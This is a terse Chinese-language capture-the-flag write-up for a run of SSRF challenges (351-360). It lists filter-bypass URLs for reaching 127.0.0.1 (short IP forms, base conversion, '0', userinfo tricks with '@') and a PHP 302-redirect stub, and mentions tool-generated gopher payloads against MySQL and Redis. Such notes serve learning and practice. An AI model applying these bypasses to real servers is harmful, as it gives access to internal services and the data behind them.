351
url=http://127.0.0.1/flag.php
352
在上题的基础上加了过滤
if(!preg_match('/localhost|127.0.0/'))
这道题绕过方法挺多
可以把127.0.0.1进制转换一下
ip地址进制转换
或者
http://127.0.1/flag,php
http://127.1/flag,php
353
同上
354
Y4师傅说了很多方法
355
host长度限制为5了
url=http://127.1/flag
或者url=http://0/flag.php
356
host长度限制为3
url=http://0/flag.php
357
可以用302跳转
在自己的服务器内放个php文件
<?php
header("Location:http://127.0.0.1/flag.php");
358
<?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$x=parse_url($url);
if(preg_match('/^http:\/\/ctf\..*show$/i',$url)){
echo file_get_contents($url);
}
url=http://ctf.@127.0.0.1/flag.php?show
@前面的ctf.会被解析成user
359
一个登录界面
点击登录抓包看到post了一个returl参数
题目提示是无密码的mysql,直接用工具生成payload
将生成的payload下划线后面的数据再一次url编码即可
360
一样的场景 题目提示redis
跟359一样url编码